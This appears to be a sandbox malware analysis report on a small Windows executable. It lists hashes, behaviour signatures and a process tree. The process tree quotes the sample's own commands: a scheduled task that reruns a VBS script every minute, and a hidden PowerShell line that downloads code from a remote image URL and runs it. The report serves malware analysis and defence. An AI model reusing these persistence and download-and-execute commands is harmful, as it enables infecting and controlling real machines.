Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
-
submitted
07/08/2023, 12:23
General
-
Target
feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe
-
Size
6KB
-
MD5
77421b1f90fc1e9247f693e857e8c429
-
SHA1
63c26635980d5a185a24d1be79c877a1e8507133
-
SHA256
feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc
-
SHA512
0bb90e930e0856504631a95792175a149b8565a9acbfdbe68a74e13573e00f1eb433b3c73439523e670b3b66559619c3c85efce9881544f0381afc88e3e8b095
-
SSDEEP
96:1jYUzP8hRH7AKjC2LcS14bqxqsmthY2VxEzNt:Fz8hRb1CNSGJsmjYSu
Malware Config
Extracted
https://a.top4top.net/p_814sg63b2.jpg
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Drops file in System32 directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe"C:\Users\Admin\AppData\Local\Temp\feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {900CD88D-98AF-4386-8560-D3F9AA4ADF99} S-1-5-21-377084978-2088738870-2818360375-1000:DSWJWADP\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://a.top4top.net/p_814sg63b2.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://a.top4top.net/p_814sg63b2.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack4⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
537B
MD544476af998bf0a5714e3ab100f022a1e
SHA1bf26b1f4227b8bfc27d4a7cb2a1cdd4ad224d08e
SHA256ef4eae75f800b98fb7c189bd92ba4a1db6d1cc665791634d5ec3c3fe535c1ec2
SHA512e02c3d2590f478deafaf3f20c421951c26ccf966817a7299fe2a4ede856190960f1853a4a2907d28f2ff24a357e9d0c039a69d1ee5f53e5c9ffde428d911bd99
-
Filesize
32KB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
512KB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB